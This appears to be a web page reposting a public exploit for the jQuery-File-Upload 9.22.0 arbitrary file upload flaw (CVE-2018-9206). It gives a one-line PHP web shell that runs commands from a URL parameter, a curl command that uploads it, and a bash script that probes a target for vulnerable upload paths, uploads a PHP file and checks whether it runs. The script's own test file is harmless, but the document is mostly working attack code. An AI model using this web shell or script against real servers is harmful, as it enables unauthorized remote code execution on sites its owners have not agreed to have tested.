توییت
کد:
# Title: jQuery-File-Upload 9.22.0 - Arbitrary File Upload # Author: Larry W. Cashdollar, @_larry0 # Date: 2018-10-09 # Vendor: https://github.com/blueimp # Download Site: https://github.com/blueimp/jQuery-File-Upload/releases # CVE-ID: N/A # Vulnerability: # The code in https://github.com/blueimp/jQuery-File-Upload/blob/master/server/php/UploadHandler.php # doesn't require any validation to upload files to the server. It also doesn't exclude file types. # This allows for remote code execution. # shell.php: <?php $cmd=$_GET['cmd']; system($cmd);?> # Exploit Code: $ curl -F "[email protected]" http://localhost/jQuery-File-Upload-9.22.0/server/php/index.php #!/bin/bash USERAGENT="Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0" PATHS=("server/php/upload.class.php" "example/upload.php" "server/php/UploadHandler.php" "php/index.php") MALICIOUS_FILE="$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 12 | head -n 1).php" # What is added in this exploit from the original version # - a bit of refactoring # - automatically request the right filename if it already exists on server ex: 'file (1).php' # - Try to detect plugin version, # - Try to detect index.html (allowing files upload via gui) # Checking curl & jq curl -h &>/dev/null if [ $? -ne 0 ]; then echo "[!] Please install curl." echo "# apt install curl" exit 1 fi jq -h &>/dev/null if [ $? -ne 0 ]; then echo "[!] Please install jq." echo "# apt install jq" exit 1 fi # Checking url if [ -z $1 ]; then echo "[!] Please supply a target host as an argument." echo "$0 http://www.example.com" exit 1 fi # Generating payload echo "<?php echo "it works"; unlink(__FILE__); ?>" > ${MALICIOUS_FILE} echo "_________________________________________________ _______________________________" echo "|PoC Exploit for Blueimp's jQuery File Uploader CVE-2018-9206" echo "|Checks for older versions of the code and upload an harmless file." echo "|" echo "| @_larry0, @phackt_ul" echo "|Works for version <= 9.22.0 and with Apache > 2.3.9 (AllowOverride None)." echo "---/" echo echo "[+] Checking variations :" # Creating alias curl='curl --connect-timeout 10 -sk -A "${USERAGENT}"' index=-1 found=0 # Looking for upload php class file for x in ${PATHS[@]}; do echo "[*] Testing... -> $1/$x" ${curl} -i "$1/$x" | head -1 | grep 200 &>/dev/null if [ $? -eq 0 ]; then echo "[+] Found Path: $x" index=$((${index}+1)) found=1 break; fi; index=$((${index}+1)) done # Determining the exploit path according to the jquery version exploit_path="" if [ ${index} -eq 0 -o ${index} -eq 2 ];then exploit_path="server/php/index.php" fi if [ ${index} -eq 1 ];then exploit_path="example/upload.php" fi if [ ${index} -eq 3 ];then exploit_path="php/index.php" fi if [ ${found} -ne 1 ]; then echo "[!] ### Error: A vulnerable jQuery-File-Upload plugin was not found!" exit 1 fi # Trying to detect bower.json, package.json version_files=("bower.json package.json") for x in ${version_files[@]}; do version=`${curl} "$1/$x" | jq -r .version` if [ "X" != "X""${version}" ]; then echo "[!] Found: Plugin version ${version}" break; fi done # Trying to detect index.html ${curl} "$1/index.html" | grep -i "jquery file upload" &>/dev/null if [ $? -eq 0 ]; then echo "[!] Found: $1/index.html is accessible" fi # Uploading payload res="" echo "[+] Running ${curl} -F "files[]=@${MALICIOUS_FILE}" -F "filename=${MALICIOUS_FILE}" "$1/${exploit_path}"" filename=`${curl} -F "files[]=@${MALICIOUS_FILE}" -F "filename=${MALICIOUS_FILE}" "$1/${exploit_path}" | jq -r .files[].name` if [ "X""${filename}" == "X" ]; then echo "[!] It seems that we had a false positive! :(" exit 1 fi filename=`echo "$filename" | sed 's/ /%20/g'` # Trying to see if victim has been exploited echo "[+] Testing path: $1/$(dirname ${exploit_path})/files/${filename}" res=`${curl} "$1/$(dirname ${exploit_path})/files/${filename}"` if [ "${res}" == "it works" ]; then echo "[!] Found: $1 is vulnerable" else echo "[+] Seems not vulnerable :(" fi rm -f "${MALICIOUS_FILE}" &>/dev/null
نظر